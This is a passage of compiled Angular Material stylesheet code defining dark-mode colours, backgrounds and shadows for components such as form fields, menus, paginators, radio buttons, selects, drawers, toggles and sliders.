.mat-datepicker-toggle-active.mat-accent[_ngcontent-%COMP%]{color:#7b1fa2}.darkMode[_ngcontent-%COMP%] .mat-datepicker-toggle-active.mat-warn[_ngcontent-%COMP%]{color:#f44336}.darkMode[_ngcontent-%COMP%] .mat-date-range-input-inner[disabled][_ngcontent-%COMP%]{color:#ffffff80}.darkMode[_ngcontent-%COMP%] .mat-dialog-container[_ngcontent-%COMP%]{box-shadow:0 11px 15px -7px #0003,0 24px 38px 3px #00000024,0 9px 46px 8px #0000001f;background:#424242;color:#fff}.darkMode[_ngcontent-%COMP%] .mat-divider[_ngcontent-%COMP%]{border-top-color:#ffffff1f}.darkMode[_ngcontent-%COMP%] .mat-divider-vertical[_ngcontent-%COMP%]{border-right-color:#ffffff1f}.darkMode[_ngcontent-%COMP%] .mat-expansion-panel[_ngcontent-%COMP%]{background:#424242;color:#fff}.darkMode[_ngcontent-%COMP%] .mat-expansion-panel[_ngcontent-%COMP%]:not([class*=mat-elevation-z]){box-shadow:0 3px 1px -2px #0003,0 2px 2px #00000024,0 1px 5px #0000001f}.darkMode[_ngcontent-%COMP%] .mat-action-row[_ngcontent-%COMP%]{border-top-color:#ffffff1f}.darkMode[_ngcontent-%COMP%] .mat-expansion-panel[_ngcontent-%COMP%] .mat-expansion-panel-header.cdk-keyboard-focused[_ngcontent-%COMP%]:not([aria-disabled=true]), .darkMode[_ngcontent-%COMP%] .mat-expansion-panel[_ngcontent-%COMP%] .mat-expansion-panel-header.cdk-program-focused[_ngcontent-%COMP%]:not([aria-disabled=true]), .darkMode[_ngcontent-%COMP%] .mat-expansion-panel[_ngcontent-%COMP%]:not(.mat-expanded) .mat-expansion-panel-header[_ngcontent-%COMP%]:hover:not([aria-disabled=true]){background:rgba(255,255,255,.04)}@media (hover: none){.darkMode[_ngcontent-%COMP%] .mat-expansion-panel[_ngcontent-%COMP%]:not(.mat-expanded):not([aria-disabled=true]) .mat-expansion-panel-header[_ngcontent-%COMP%]:hover{background:#424242}}.darkMode[_ngcontent-%COMP%] .mat-expansion-panel-header-title[_ngcontent-%COMP%]{color:#fff}.darkMode[_ngcontent-%COMP%] .mat-expansion-panel-header-description[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-expansion-indicator[_ngcontent-%COMP%]:after{color:#ffffffb3}.darkMode[_ngcontent-%COMP%] .mat-expansion-panel-header[aria-disabled=true][_ngcontent-%COMP%]{color:#ffffff4d}.darkMode[_ngcontent-%COMP%] .mat-expansion-panel-header[aria-disabled=true][_ngcontent-%COMP%] .mat-expansion-panel-header-title[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-expansion-panel-header[aria-disabled=true][_ngcontent-%COMP%] .mat-expansion-panel-header-description[_ngcontent-%COMP%]{color:inherit}.darkMode[_ngcontent-%COMP%] .mat-form-field-label[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-hint[_ngcontent-%COMP%]{color:#ffffffb3}.darkMode[_ngcontent-%COMP%] .mat-form-field.mat-focused[_ngcontent-%COMP%] .mat-form-field-label[_ngcontent-%COMP%]{color:#2196f3}.darkMode[_ngcontent-%COMP%] .mat-form-field.mat-focused[_ngcontent-%COMP%] .mat-form-field-label.mat-accent[_ngcontent-%COMP%]{color:#7b1fa2}.darkMode[_ngcontent-%COMP%] .mat-form-field.mat-focused[_ngcontent-%COMP%] .mat-form-field-label.mat-warn[_ngcontent-%COMP%]{color:#f44336}.darkMode[_ngcontent-%COMP%] .mat-focused[_ngcontent-%COMP%] .mat-form-field-required-marker[_ngcontent-%COMP%]{color:#7b1fa2}.darkMode[_ngcontent-%COMP%] .mat-form-field-ripple[_ngcontent-%COMP%]{background-color:#fff}.darkMode[_ngcontent-%COMP%] .mat-form-field.mat-focused[_ngcontent-%COMP%] .mat-form-field-ripple[_ngcontent-%COMP%]{background-color:#2196f3}.darkMode[_ngcontent-%COMP%] .mat-form-field.mat-focused[_ngcontent-%COMP%] .mat-form-field-ripple.mat-accent[_ngcontent-%COMP%]{background-color:#7b1fa2}.darkMode[_ngcontent-%COMP%] .mat-form-field.mat-focused[_ngcontent-%COMP%] .mat-form-field-ripple.mat-warn[_ngcontent-%COMP%]{background-color:#f44336}.darkMode[_ngcontent-%COMP%] .mat-form-field-type-mat-native-select.mat-focused[_ngcontent-%COMP%]:not(.mat-form-field-invalid) .mat-form-field-infix[_ngcontent-%COMP%]:after{color:#2196f3}.darkMode[_ngcontent-%COMP%] .mat-form-field-type-mat-native-select.mat-focused[_ngcontent-%COMP%]:not(.mat-form-field-invalid).mat-accent .mat-form-field-infix[_ngcontent-%COMP%]:after{color:#7b1fa2}.darkMode[_ngcontent-%COMP%] .mat-form-field-type-mat-native-select.mat-focused[_ngcontent-%COMP%]:not(.mat-form-field-invalid).mat-warn .mat-form-field-infix[_ngcontent-%COMP%]:after{color:#f44336}.darkMode[_ngcontent-%COMP%] .mat-form-field.mat-form-field-invalid[_ngcontent-%COMP%] .mat-form-field-label[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-form-field.mat-form-field-invalid[_ngcontent-%COMP%] .mat-form-field-label.mat-accent[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-form-field.mat-form-field-invalid[_ngcontent-%COMP%] .mat-form-field-label[_ngcontent-%COMP%] .mat-form-field-required-marker[_ngcontent-%COMP%]{color:#f44336}.darkMode[_ngcontent-%COMP%] .mat-form-field.mat-form-field-invalid[_ngcontent-%COMP%] .mat-form-field-ripple[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-form-field.mat-form-field-invalid[_ngcontent-%COMP%] .mat-form-field-ripple.mat-accent[_ngcontent-%COMP%]{background-color:#f44336}.darkMode[_ngcontent-%COMP%] .mat-error[_ngcontent-%COMP%]{color:#f44336}.darkMode[_ngcontent-%COMP%] .mat-form-field-appearance-legacy[_ngcontent-%COMP%] .mat-form-field-label[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-form-field-appearance-legacy[_ngcontent-%COMP%] .mat-hint[_ngcontent-%COMP%]{color:#ffffffb3}.darkMode[_ngcontent-%COMP%] .mat-form-field-appearance-legacy[_ngcontent-%COMP%] .mat-form-field-underline[_ngcontent-%COMP%]{background-color:#ffffffb3}.darkMode[_ngcontent-%COMP%] .mat-form-field-appearance-legacy.mat-form-field-disabled[_ngcontent-%COMP%] .mat-form-field-underline[_ngcontent-%COMP%]{background-image:linear-gradient(to right,rgba(255,255,255,.7) 0%,rgba(255,255,255,.7) 33%,transparent 0%);background-size:4px 100%;background-repeat:repeat-x}.darkMode[_ngcontent-%COMP%] .mat-form-field-appearance-standard[_ngcontent-%COMP%] .mat-form-field-underline[_ngcontent-%COMP%]{background-color:#ffffffb3}.darkMode[_ngcontent-%COMP%] .mat-form-field-appearance-standard.mat-form-field-disabled[_ngcontent-%COMP%] .mat-form-field-underline[_ngcontent-%COMP%]{background-image:linear-gradient(to right,rgba(255,255,255,.7) 0%,rgba(255,255,255,.7) 33%,transparent 0%);background-size:4px 100%;background-repeat:repeat-x}.darkMode[_ngcontent-%COMP%] .mat-form-field-appearance-fill[_ngcontent-%COMP%] .mat-form-field-flex[_ngcontent-%COMP%]{background-color:#ffffff1a}.darkMode[_ngcontent-%COMP%] .mat-form-field-appearance-fill.mat-form-field-disabled[_ngcontent-%COMP%] .mat-form-field-flex[_ngcontent-%COMP%]{background-color:#ffffff0d}.darkMode[_ngcontent-%COMP%] .mat-form-field-appearance-fill[_ngcontent-%COMP%] .mat-form-field-underline[_ngcontent-%COMP%]:before{background-color:#ffffff80}.darkMode[_ngcontent-%COMP%] .mat-form-field-appearance-fill.mat-form-field-disabled[_ngcontent-%COMP%] .mat-form-field-label[_ngcontent-%COMP%]{color:#ffffff80}.darkMode[_ngcontent-%COMP%] .mat-form-field-appearance-fill.mat-form-field-disabled[_ngcontent-%COMP%] .mat-form-field-underline[_ngcontent-%COMP%]:before{background-color:transparent}.darkMode[_ngcontent-%COMP%] .mat-form-field-appearance-outline[_ngcontent-%COMP%] .mat-form-field-outline[_ngcontent-%COMP%]{color:#ffffff4d}.darkMode[_ngcontent-%COMP%] .mat-form-field-appearance-outline[_ngcontent-%COMP%] .mat-form-field-outline-thick[_ngcontent-%COMP%]{color:#fff}.darkMode[_ngcontent-%COMP%] .mat-form-field-appearance-outline.mat-focused[_ngcontent-%COMP%] .mat-form-field-outline-thick[_ngcontent-%COMP%]{color:#2196f3}.darkMode[_ngcontent-%COMP%] .mat-form-field-appearance-outline.mat-focused.mat-accent[_ngcontent-%COMP%] .mat-form-field-outline-thick[_ngcontent-%COMP%]{color:#7b1fa2}.darkMode[_ngcontent-%COMP%] .mat-form-field-appearance-outline.mat-focused.mat-warn[_ngcontent-%COMP%] .mat-form-field-outline-thick[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-form-field-appearance-outline.mat-form-field-invalid.mat-form-field-invalid[_ngcontent-%COMP%] .mat-form-field-outline-thick[_ngcontent-%COMP%]{color:#f44336}.darkMode[_ngcontent-%COMP%] .mat-form-field-appearance-outline.mat-form-field-disabled[_ngcontent-%COMP%] .mat-form-field-label[_ngcontent-%COMP%]{color:#ffffff80}.darkMode[_ngcontent-%COMP%] .mat-form-field-appearance-outline.mat-form-field-disabled[_ngcontent-%COMP%] .mat-form-field-outline[_ngcontent-%COMP%]{color:#ffffff26}.darkMode[_ngcontent-%COMP%] .mat-icon.mat-primary[_ngcontent-%COMP%]{color:#2196f3}.darkMode[_ngcontent-%COMP%] .mat-icon.mat-accent[_ngcontent-%COMP%]{color:#7b1fa2}.darkMode[_ngcontent-%COMP%] .mat-icon.mat-warn[_ngcontent-%COMP%]{color:#f44336}.darkMode[_ngcontent-%COMP%] .mat-form-field-type-mat-native-select[_ngcontent-%COMP%] .mat-form-field-infix[_ngcontent-%COMP%]:after{color:#ffffffb3}.darkMode[_ngcontent-%COMP%] .mat-input-element[_ngcontent-%COMP%]:disabled, .darkMode[_ngcontent-%COMP%] .mat-form-field-type-mat-native-select.mat-form-field-disabled[_ngcontent-%COMP%] .mat-form-field-infix[_ngcontent-%COMP%]:after{color:#ffffff80}.darkMode[_ngcontent-%COMP%] .mat-input-element[_ngcontent-%COMP%]{caret-color:#2196f3}.darkMode[_ngcontent-%COMP%] .mat-input-element[_ngcontent-%COMP%]::placeholder{color:#ffffff80}.darkMode[_ngcontent-%COMP%] .mat-input-element[_ngcontent-%COMP%]::-moz-placeholder{color:#ffffff80}.darkMode[_ngcontent-%COMP%] .mat-input-element[_ngcontent-%COMP%]::-webkit-input-placeholder{color:#ffffff80}.darkMode[_ngcontent-%COMP%] .mat-input-element[_ngcontent-%COMP%]:-ms-input-placeholder{color:#ffffff80}.darkMode[_ngcontent-%COMP%] .mat-input-element[_ngcontent-%COMP%]:not(.mat-native-select-inline) option[_ngcontent-%COMP%]{color:#000000de}.darkMode[_ngcontent-%COMP%] .mat-input-element[_ngcontent-%COMP%]:not(.mat-native-select-inline) option[_ngcontent-%COMP%]:disabled{color:#00000061}.darkMode[_ngcontent-%COMP%] .mat-form-field.mat-accent[_ngcontent-%COMP%] .mat-input-element[_ngcontent-%COMP%]{caret-color:#7b1fa2}.darkMode[_ngcontent-%COMP%] .mat-form-field.mat-warn[_ngcontent-%COMP%] .mat-input-element[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-form-field-invalid[_ngcontent-%COMP%] .mat-input-element[_ngcontent-%COMP%]{caret-color:#f44336}.darkMode[_ngcontent-%COMP%] .mat-form-field-type-mat-native-select.mat-form-field-invalid[_ngcontent-%COMP%] .mat-form-field-infix[_ngcontent-%COMP%]:after{color:#f44336}.darkMode[_ngcontent-%COMP%] .mat-list-base[_ngcontent-%COMP%] .mat-list-item[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-list-base[_ngcontent-%COMP%] .mat-list-option[_ngcontent-%COMP%]{color:#fff}.darkMode[_ngcontent-%COMP%] .mat-list-base[_ngcontent-%COMP%] .mat-subheader[_ngcontent-%COMP%]{color:#ffffffb3}.darkMode[_ngcontent-%COMP%] .mat-list-base[_ngcontent-%COMP%] .mat-list-item-disabled[_ngcontent-%COMP%]{background-color:#ffffff1f;color:#ffffff80}.darkMode[_ngcontent-%COMP%] .mat-list-option[_ngcontent-%COMP%]:hover, .darkMode[_ngcontent-%COMP%] .mat-list-option[_ngcontent-%COMP%]:focus, .darkMode[_ngcontent-%COMP%] .mat-nav-list[_ngcontent-%COMP%] .mat-list-item[_ngcontent-%COMP%]:hover, .darkMode[_ngcontent-%COMP%] .mat-nav-list[_ngcontent-%COMP%] .mat-list-item[_ngcontent-%COMP%]:focus, .darkMode[_ngcontent-%COMP%] .mat-action-list[_ngcontent-%COMP%] .mat-list-item[_ngcontent-%COMP%]:hover, .darkMode[_ngcontent-%COMP%] .mat-action-list[_ngcontent-%COMP%] .mat-list-item[_ngcontent-%COMP%]:focus{background:rgba(255,255,255,.04)}.darkMode[_ngcontent-%COMP%] .mat-list-single-selected-option[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-list-single-selected-option[_ngcontent-%COMP%]:hover, .darkMode[_ngcontent-%COMP%] .mat-list-single-selected-option[_ngcontent-%COMP%]:focus{background:rgba(255,255,255,.12)}.darkMode[_ngcontent-%COMP%] .mat-menu-panel[_ngcontent-%COMP%]{background:#424242}.darkMode[_ngcontent-%COMP%] .mat-menu-panel[_ngcontent-%COMP%]:not([class*=mat-elevation-z]){box-shadow:0 2px 4px -1px #0003,0 4px 5px #00000024,0 1px 10px #0000001f}.darkMode[_ngcontent-%COMP%] .mat-menu-item[_ngcontent-%COMP%]{background:transparent;color:#fff}.darkMode[_ngcontent-%COMP%] .mat-menu-item[disabled][_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-menu-item[disabled][_ngcontent-%COMP%] .mat-menu-submenu-icon[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-menu-item[disabled][_ngcontent-%COMP%] .mat-icon-no-color[_ngcontent-%COMP%]{color:#ffffff80}.darkMode[_ngcontent-%COMP%] .mat-menu-item[_ngcontent-%COMP%] .mat-icon-no-color[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-menu-submenu-icon[_ngcontent-%COMP%]{color:#fff}.darkMode[_ngcontent-%COMP%] .mat-menu-item[_ngcontent-%COMP%]:hover:not([disabled]), .darkMode[_ngcontent-%COMP%] .mat-menu-item.cdk-program-focused[_ngcontent-%COMP%]:not([disabled]), .darkMode[_ngcontent-%COMP%] .mat-menu-item.cdk-keyboard-focused[_ngcontent-%COMP%]:not([disabled]), .darkMode[_ngcontent-%COMP%] .mat-menu-item-highlighted[_ngcontent-%COMP%]:not([disabled]){background:rgba(255,255,255,.04)}.darkMode[_ngcontent-%COMP%] .mat-paginator[_ngcontent-%COMP%]{background:#424242}.darkMode[_ngcontent-%COMP%] .mat-paginator[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-paginator-page-size[_ngcontent-%COMP%] .mat-select-trigger[_ngcontent-%COMP%]{color:#ffffffb3}.darkMode[_ngcontent-%COMP%] .mat-paginator-decrement[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-paginator-increment[_ngcontent-%COMP%]{border-top:2px solid white;border-right:2px solid white}.darkMode[_ngcontent-%COMP%] .mat-paginator-first[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-paginator-last[_ngcontent-%COMP%]{border-top:2px solid white}.darkMode[_ngcontent-%COMP%] .mat-icon-button[disabled][_ngcontent-%COMP%] .mat-paginator-decrement[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-icon-button[disabled][_ngcontent-%COMP%] .mat-paginator-increment[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-icon-button[disabled][_ngcontent-%COMP%] .mat-paginator-first[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-icon-button[disabled][_ngcontent-%COMP%] .mat-paginator-last[_ngcontent-%COMP%]{border-color:#ffffff80}.darkMode[_ngcontent-%COMP%] .mat-progress-bar-background[_ngcontent-%COMP%]{fill:#2c4a61}.darkMode[_ngcontent-%COMP%] .mat-progress-bar-buffer[_ngcontent-%COMP%]{background-color:#2c4a61}.darkMode[_ngcontent-%COMP%] .mat-progress-bar-fill[_ngcontent-%COMP%]:after{background-color:#2196f3}.darkMode[_ngcontent-%COMP%] .mat-progress-bar.mat-accent[_ngcontent-%COMP%] .mat-progress-bar-background[_ngcontent-%COMP%]{fill:#432c4d}.darkMode[_ngcontent-%COMP%] .mat-progress-bar.mat-accent[_ngcontent-%COMP%] .mat-progress-bar-buffer[_ngcontent-%COMP%]{background-color:#432c4d}.darkMode[_ngcontent-%COMP%] .mat-progress-bar.mat-accent[_ngcontent-%COMP%] .mat-progress-bar-fill[_ngcontent-%COMP%]:after{background-color:#7b1fa2}.darkMode[_ngcontent-%COMP%] .mat-progress-bar.mat-warn[_ngcontent-%COMP%] .mat-progress-bar-background[_ngcontent-%COMP%]{fill:#613532}.darkMode[_ngcontent-%COMP%] .mat-progress-bar.mat-warn[_ngcontent-%COMP%] .mat-progress-bar-buffer[_ngcontent-%COMP%]{background-color:#613532}.darkMode[_ngcontent-%COMP%] .mat-progress-bar.mat-warn[_ngcontent-%COMP%] .mat-progress-bar-fill[_ngcontent-%COMP%]:after{background-color:#f44336}.darkMode[_ngcontent-%COMP%] .mat-progress-spinner[_ngcontent-%COMP%] circle[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-spinner[_ngcontent-%COMP%] circle[_ngcontent-%COMP%]{stroke:#2196f3}.darkMode[_ngcontent-%COMP%] .mat-progress-spinner.mat-accent[_ngcontent-%COMP%] circle[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-spinner.mat-accent[_ngcontent-%COMP%] circle[_ngcontent-%COMP%]{stroke:#7b1fa2}.darkMode[_ngcontent-%COMP%] .mat-progress-spinner.mat-warn[_ngcontent-%COMP%] circle[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-spinner.mat-warn[_ngcontent-%COMP%] circle[_ngcontent-%COMP%]{stroke:#f44336}.darkMode[_ngcontent-%COMP%] .mat-radio-outer-circle[_ngcontent-%COMP%]{border-color:#ffffffb3}.darkMode[_ngcontent-%COMP%] .mat-radio-button.mat-primary.mat-radio-checked[_ngcontent-%COMP%] .mat-radio-outer-circle[_ngcontent-%COMP%]{border-color:#2196f3}.darkMode[_ngcontent-%COMP%] .mat-radio-button.mat-primary[_ngcontent-%COMP%] .mat-radio-inner-circle[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-radio-button.mat-primary[_ngcontent-%COMP%] .mat-radio-ripple[_ngcontent-%COMP%] .mat-ripple-element[_ngcontent-%COMP%]:not(.mat-radio-persistent-ripple), .darkMode[_ngcontent-%COMP%] .mat-radio-button.mat-primary.mat-radio-checked[_ngcontent-%COMP%] .mat-radio-persistent-ripple[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-radio-button.mat-primary[_ngcontent-%COMP%]:active .mat-radio-persistent-ripple[_ngcontent-%COMP%]{background-color:#2196f3}.darkMode[_ngcontent-%COMP%] .mat-radio-button.mat-accent.mat-radio-checked[_ngcontent-%COMP%] .mat-radio-outer-circle[_ngcontent-%COMP%]{border-color:#7b1fa2}.darkMode[_ngcontent-%COMP%] .mat-radio-button.mat-accent[_ngcontent-%COMP%] .mat-radio-inner-circle[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-radio-button.mat-accent[_ngcontent-%COMP%] .mat-radio-ripple[_ngcontent-%COMP%] .mat-ripple-element[_ngcontent-%COMP%]:not(.mat-radio-persistent-ripple), .darkMode[_ngcontent-%COMP%] .mat-radio-button.mat-accent.mat-radio-checked[_ngcontent-%COMP%] .mat-radio-persistent-ripple[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-radio-button.mat-accent[_ngcontent-%COMP%]:active .mat-radio-persistent-ripple[_ngcontent-%COMP%]{background-color:#7b1fa2}.darkMode[_ngcontent-%COMP%] .mat-radio-button.mat-warn.mat-radio-checked[_ngcontent-%COMP%] .mat-radio-outer-circle[_ngcontent-%COMP%]{border-color:#f44336}.darkMode[_ngcontent-%COMP%] .mat-radio-button.mat-warn[_ngcontent-%COMP%] .mat-radio-inner-circle[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-radio-button.mat-warn[_ngcontent-%COMP%] .mat-radio-ripple[_ngcontent-%COMP%] .mat-ripple-element[_ngcontent-%COMP%]:not(.mat-radio-persistent-ripple), .darkMode[_ngcontent-%COMP%] .mat-radio-button.mat-warn.mat-radio-checked[_ngcontent-%COMP%] .mat-radio-persistent-ripple[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-radio-button.mat-warn[_ngcontent-%COMP%]:active .mat-radio-persistent-ripple[_ngcontent-%COMP%]{background-color:#f44336}.darkMode[_ngcontent-%COMP%] .mat-radio-button.mat-radio-disabled.mat-radio-checked[_ngcontent-%COMP%] .mat-radio-outer-circle[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-radio-button.mat-radio-disabled[_ngcontent-%COMP%] .mat-radio-outer-circle[_ngcontent-%COMP%]{border-color:#ffffff80}.darkMode[_ngcontent-%COMP%] .mat-radio-button.mat-radio-disabled[_ngcontent-%COMP%] .mat-radio-ripple[_ngcontent-%COMP%] .mat-ripple-element[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-radio-button.mat-radio-disabled[_ngcontent-%COMP%] .mat-radio-inner-circle[_ngcontent-%COMP%]{background-color:#ffffff80}.darkMode[_ngcontent-%COMP%] .mat-radio-button.mat-radio-disabled[_ngcontent-%COMP%] .mat-radio-label-content[_ngcontent-%COMP%]{color:#ffffff80}.darkMode[_ngcontent-%COMP%] .mat-radio-button[_ngcontent-%COMP%] .mat-ripple-element[_ngcontent-%COMP%]{background-color:#fff}.darkMode[_ngcontent-%COMP%] .mat-select-value[_ngcontent-%COMP%]{color:#fff}.darkMode[_ngcontent-%COMP%] .mat-select-placeholder[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-select-disabled[_ngcontent-%COMP%] .mat-select-value[_ngcontent-%COMP%]{color:#ffffff80}.darkMode[_ngcontent-%COMP%] .mat-select-arrow[_ngcontent-%COMP%]{color:#ffffffb3}.darkMode[_ngcontent-%COMP%] .mat-select-panel[_ngcontent-%COMP%]{background:#424242}.darkMode[_ngcontent-%COMP%] .mat-select-panel[_ngcontent-%COMP%]:not([class*=mat-elevation-z]){box-shadow:0 2px 4px -1px #0003,0 4px 5px #00000024,0 1px 10px #0000001f}.darkMode[_ngcontent-%COMP%] .mat-select-panel[_ngcontent-%COMP%] .mat-option.mat-selected[_ngcontent-%COMP%]:not(.mat-option-multiple){background:rgba(255,255,255,.12)}.darkMode[_ngcontent-%COMP%] .mat-form-field.mat-focused.mat-primary[_ngcontent-%COMP%] .mat-select-arrow[_ngcontent-%COMP%]{color:#2196f3}.darkMode[_ngcontent-%COMP%] .mat-form-field.mat-focused.mat-accent[_ngcontent-%COMP%] .mat-select-arrow[_ngcontent-%COMP%]{color:#7b1fa2}.darkMode[_ngcontent-%COMP%] .mat-form-field.mat-focused.mat-warn[_ngcontent-%COMP%] .mat-select-arrow[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-form-field[_ngcontent-%COMP%] .mat-select.mat-select-invalid[_ngcontent-%COMP%] .mat-select-arrow[_ngcontent-%COMP%]{color:#f44336}.darkMode[_ngcontent-%COMP%] .mat-form-field[_ngcontent-%COMP%] .mat-select.mat-select-disabled[_ngcontent-%COMP%] .mat-select-arrow[_ngcontent-%COMP%]{color:#ffffff80}.darkMode[_ngcontent-%COMP%] .mat-drawer-container[_ngcontent-%COMP%]{background-color:#303030;color:#fff}.darkMode[_ngcontent-%COMP%] .mat-drawer[_ngcontent-%COMP%]{background-color:#424242;color:#fff}.darkMode[_ngcontent-%COMP%] .mat-drawer.mat-drawer-push[_ngcontent-%COMP%]{background-color:#424242}.darkMode[_ngcontent-%COMP%] .mat-drawer[_ngcontent-%COMP%]:not(.mat-drawer-side){box-shadow:0 8px 10px -5px #0003,0 16px 24px 2px #00000024,0 6px 30px 5px #0000001f}.darkMode[_ngcontent-%COMP%] .mat-drawer-side[_ngcontent-%COMP%]{border-right:solid 1px rgba(255,255,255,.12)}.darkMode[_ngcontent-%COMP%] .mat-drawer-side.mat-drawer-end[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] [dir=rtl][_ngcontent-%COMP%] .mat-drawer-side[_ngcontent-%COMP%]{border-left:solid 1px rgba(255,255,255,.12);border-right:none}.darkMode[_ngcontent-%COMP%] [dir=rtl][_ngcontent-%COMP%] .mat-drawer-side.mat-drawer-end[_ngcontent-%COMP%]{border-left:none;border-right:solid 1px rgba(255,255,255,.12)}.darkMode[_ngcontent-%COMP%] .mat-drawer-backdrop.mat-drawer-shown[_ngcontent-%COMP%]{background-color:#bdbdbd99}.darkMode[_ngcontent-%COMP%] .mat-slide-toggle.mat-checked[_ngcontent-%COMP%] .mat-slide-toggle-thumb[_ngcontent-%COMP%]{background-color:#7b1fa2}.darkMode[_ngcontent-%COMP%] .mat-slide-toggle.mat-checked[_ngcontent-%COMP%] .mat-slide-toggle-bar[_ngcontent-%COMP%]{background-color:#7b1fa28a}.darkMode[_ngcontent-%COMP%] .mat-slide-toggle.mat-checked[_ngcontent-%COMP%] .mat-ripple-element[_ngcontent-%COMP%]{background-color:#7b1fa2}.darkMode[_ngcontent-%COMP%] .mat-slide-toggle.mat-primary.mat-checked[_ngcontent-%COMP%] .mat-slide-toggle-thumb[_ngcontent-%COMP%]{background-color:#2196f3}.darkMode[_ngcontent-%COMP%] .mat-slide-toggle.mat-primary.mat-checked[_ngcontent-%COMP%] .mat-slide-toggle-bar[_ngcontent-%COMP%]{background-color:#2196f38a}.darkMode[_ngcontent-%COMP%] .mat-slide-toggle.mat-primary.mat-checked[_ngcontent-%COMP%] .mat-ripple-element[_ngcontent-%COMP%]{background-color:#2196f3}.darkMode[_ngcontent-%COMP%] .mat-slide-toggle.mat-warn.mat-checked[_ngcontent-%COMP%] .mat-slide-toggle-thumb[_ngcontent-%COMP%]{background-color:#f44336}.darkMode[_ngcontent-%COMP%] .mat-slide-toggle.mat-warn.mat-checked[_ngcontent-%COMP%] .mat-slide-toggle-bar[_ngcontent-%COMP%]{background-color:#f443368a}.darkMode[_ngcontent-%COMP%] .mat-slide-toggle.mat-warn.mat-checked[_ngcontent-%COMP%] .mat-ripple-element[_ngcontent-%COMP%]{background-color:#f44336}.darkMode[_ngcontent-%COMP%] .mat-slide-toggle[_ngcontent-%COMP%]:not(.mat-checked) .mat-ripple-element[_ngcontent-%COMP%]{background-color:#fff}.darkMode[_ngcontent-%COMP%] .mat-slide-toggle-thumb[_ngcontent-%COMP%]{box-shadow:0 2px 1px -1px #0003,0 1px 1px #00000024,0 1px 3px #0000001f;background-color:#bdbdbd}.darkMode[_ngcontent-%COMP%] .mat-slide-toggle-bar[_ngcontent-%COMP%]{background-color:#ffffff80}.darkMode[_ngcontent-%COMP%] .mat-slider-track-background[_ngcontent-%COMP%]{background-color:#ffffff4d}.darkMode[_ngcontent-%COMP%] .mat-slider.mat-primary[_ngcontent-%COMP%] .mat-slider-track-fill[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-slider.mat-primary[_ngcontent-%COMP%] .mat-slider-thumb[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-slider.mat-primary[_ngcontent-%COMP%] .mat-slider-thumb-label[_ngcontent-%COMP%]{background-color:#2196f3}.darkMode[_ngcontent-%COMP%] .mat-slider.mat-primary[_ngcontent-%COMP%] .mat-slider-thumb-label-text[_ngcontent-%COMP%]{color:#fff}.darkMode[_ngcontent-%COMP%] .mat-slider.mat-primary[_ngcontent-%COMP%] .mat-slider-focus-ring[_ngcontent-%COMP%]{background-color:#2196f333}.darkMode[_ngcontent-%COMP%] .mat-slider.mat-accent[_ngcontent-%COMP%] .mat-slider-track-fill[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-slider.mat-accent[_ngcontent-%COMP%] .mat-slider-thumb[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-slider.mat-accent[_ngcontent-%COMP%] .mat-slider-thumb-label[_ngcontent-%COMP%]{background-color:#7b1fa2}.darkMode[_ngcontent-%COMP%] .mat-slider.mat-accent[_ngcontent-%COMP%] .mat-slider-thumb-label-text[_ngcontent-%COMP%]{color:#fff}.darkMode[_ngcontent-%COMP%] .mat-slider.mat-accent[_ngcontent-%COMP%] .mat-slider-focus-ring[_ngcontent-%COMP%]{background-color:#7b1fa233}.darkMode[_ngcontent-%COMP%] .mat-slider.mat-warn[_ngcontent-%COMP%] .mat-slider-track-fill[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-slider.mat-warn[_ngcontent-%COMP%] .mat-slider-thumb[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-slider.mat-warn[_ngcontent-%COMP%] .mat-slider-thumb-label[_ngcontent-%COMP%]{background-color:#f44336}.darkMode[_ngcontent-%COMP%] .mat-slider.mat-warn[_ngcontent-%COMP%] .mat-slider-thumb-label-text[_ngcontent-%COMP%]{color:#fff}.darkMode[_ngcontent-%COMP%] .mat-slider.mat-warn[_ngcontent-%COMP%] .mat-slider-focus-ring[_ngcontent-%COMP%]{background-color:#f4433633}.darkMode[_ngcontent-%COMP%] 